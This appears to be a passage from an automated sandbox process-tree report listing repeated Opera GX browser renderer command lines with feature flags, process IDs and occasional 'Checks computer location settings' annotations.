C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=229 --field-trial-handle=10284,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=9576 /prefetch:12⤵
- Checks computer location settings
PID:6612
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --start-stack-profiler --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=230 --field-trial-handle=9512,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=7172 /prefetch:12⤵
- Checks computer location settings
PID:7380
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --start-stack-profiler --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=231 --field-trial-handle=10728,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=10736 /prefetch:12⤵PID:7620
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=232 --field-trial-handle=7808,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=5336 /prefetch:12⤵PID:6248
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=233 --field-trial-handle=7840,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=3716 /prefetch:12⤵PID:6456
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=234 --field-trial-handle=7776,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=10716 /prefetch:12⤵PID:4192
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=235 --field-trial-handle=5368,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=10008 /prefetch:12⤵PID:6516
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=236 --field-trial-handle=5788,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=9392 /prefetch:12⤵PID:3480
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=237 --field-trial-handle=10492,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=7064 /prefetch:12⤵PID:6764
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=238 --field-trial-handle=8704,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=8908 /prefetch:12⤵
- Checks computer location settings
PID:796
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --extension-process --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=239 --field-trial-handle=9492,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=5412 /prefetch:22⤵PID:7252
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=240 --field-trial-handle=5496,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=8808 /prefetch:12⤵PID:2532
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=241 --field-trial-handle=9604,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=8852 /prefetch:12⤵PID:6276
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=242 --field-trial-handle=6632,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=3080 /prefetch:12⤵PID:6804
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=243 --field-trial-handle=5816,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=8484 /prefetch:12⤵PID:4596
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=244 --field-trial-handle=8696,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=8976 /prefetch:12⤵PID:1880
-
-
